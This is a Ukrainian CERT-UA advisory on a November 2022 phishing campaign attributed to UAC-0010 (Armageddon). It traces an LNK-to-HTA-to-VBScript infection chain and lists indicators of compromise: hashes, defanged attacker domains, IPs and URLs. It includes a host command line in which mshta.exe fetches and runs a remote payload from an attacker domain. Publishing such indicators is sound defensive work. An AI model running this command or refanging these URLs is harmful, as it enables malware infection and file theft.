Загальна інформація
Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA з 07.11.2022 фіксуються розсилки електронних листів, начебто, від імені Держспецзв'язку, зі шкідливим посиланням. У разі переходу за посиланням на ЕОМ буде завантажено HTML-файл, який містить JavaScript-код, що забезпечить створення на комп'ютері жертви RAR-архіву, наприклад «08.11.2022.rar».
Згаданий архів містить файл-ярлик «Засоби ТЗІ, які мають експертний висновок про відповідність до вимог технічного захисту інформації.lnk», відкриття якого призведе до завантаження і запуску HTA-файлу, що, в свою чергу, спричинить створення запланованого завдання та подальший запуск VBScript-коду. Насамкінець, на комп'ютер будуть завантажені інші шкідливі програми, в тому числі, для викрадення файлів.
Зауважимо, що розсилка електронних листів здійснюється за допомогою сервісу @mail.gov.ua. Крім того, як і раніше, для визначення IP-адреси серверу управління використовується або третьосторонній сервіс (cloudflare-dns[.]com) або Telegram.
Активність асоційовано з діяльністю групи UAC-0010 (Armageddon).
Індикатори компрометації
Файли:
| 3adbc03f755a67fea42b6ca96b594237 | 8badadda788a53549ec889f648f3c85354c1765c7a2d8acfbcfc69aa3002e933 | 07-11-2022.xhtml |
| a19a7f22e599b4ff9a30d8917a801ffb | 424a9224b2f1a462a5de7222b98e1a95205e5bdad8beae892309be3ad4279363 | 07.11.2022.rar |
| 85dc81ba98e7ba81b00c3f4554e23f41 | c4d44834436baf347f01ac66f7e04e73bc1cb44cd938bd2992bcb11fef958801 | Засоби ТЗІ, які мають експертний висновок про відповідність до вимог технічного захисту інформації.lnk |
| c1074dbc69079bc44f517c5a2092f05e | b27b901f363304a188348880df278af5954b288b5c614c3b85e7e1d8057cf3a1 | growth.rtf |
| d67119d10668cd3f78ec2abefc6713d4 | fe37eae9986ad6d9a1709aa2993e13965d1bd9f0b7733c0a09c2b36531c31086 | jersey |
| 146694cdc0e529bb175741c8331fcbda | aafde3c78194495c57066b8e6219da1caab9031da1b22f9dc6deef14ac3b5cfc | 07_11_2022.xhtml |
| 5f2d3f456eb549f31afa372d1a877152 | 95b67d3bb530bf9ce98fa017ec2270176977a775e013df4db2038257ca6d17c3 | 07.11.2022.rar |
| ab8600c3150ff6a5a803130438fdfae9 | 53f472e9a3d3471a76f13d12417229d23efd11b047353db8b71793feacafb029 | Засоби ТЗІ, які мають експертний висновок про відповідність до вимог технічного захисту інформації.lnk |
| 0ede5c6f925b4ef08446c063c4805ff9 | 94a2b39e00ff03061093cce7ead1aab677c939400428a37a00bf89333655ba82 | 08.11.2022.arhiv |
| 1af530c3daa10a6a9ad973bd7e1904ed | 704a6ade1ad9ccb52ff52ae86ca0bce068f14134bd4f1ab6f7506b3f201ba55b | 08.11.2022.rar |
| 3864263b8b3d86a1f6861b15c646aab0 | 1281abff0809bbb1de56bed6f5ebfa111c3c42918732ededae63b76007364582 | Засоби ТЗІ, які мають експертний висновок про відповідність до вимог технічного захисту інформації.lnk |
Мережеві:
08362793@mail.gov[.]ua
154[.]111.181.171
173[.]199.90.103
45[.]32.171.4
hXXp://arhiv.ua-cip[.]org/08.11.2022.arhiv
hXXp://tzi.info-cip[.]org/07_11_2022.xhtml
hXXps://civh[.]ru/08.11/band.rtf
hXXps://hilr[.]ru/07.11/growth.rtf
hXXps://hilr[.]ru/07.11/sent.rtf
hXXps://cloudflare-dns[.]com/dns-query?name= (для визначення IP-адреси; легітимний сервіс)
hXXps://t[.]me/s/vozmoz2
hilr[.]ru
civh[.]ru
rubidiumo[.]ru
shapurt[.]ru
ardeas[.]ru
tzi.info-cip[.]org
arhiv.ua-cip[.]org
ua-cip[.]org
info-cip[.]org
Хостові:
C:\Windows\System32\mshta.exe hxxps://civh[.]ru/08.11/band.rtf
%USERPROFILE%\Contacts\jersey
Графічні зображення
***
Всі новини на тему кібератаки можна передивитися за посиланням.
